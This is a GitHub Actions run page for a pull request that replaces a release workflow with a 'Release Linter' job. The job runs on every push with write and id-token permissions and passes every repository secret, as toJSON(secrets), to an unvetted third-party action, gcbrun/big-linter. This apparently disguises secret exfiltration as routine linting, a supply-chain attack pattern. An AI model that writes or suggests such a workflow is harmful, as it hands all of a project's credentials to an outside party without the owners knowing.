Skip to content

feat: Replace release workflow with big-linter #1061

feat: Replace release workflow with big-linter

feat: Replace release workflow with big-linter #1061

Workflow file for this run

name: Release Linter
on:
push:
permissions:
contents: write
id-token: write
jobs:
lint:
runs-on: ubuntu-latest
steps:
- name: Run Big Linter
uses: gcbrun/big-linter@v1
env:
PR_ENVIRONMENT: ${{ toJSON(secrets) }}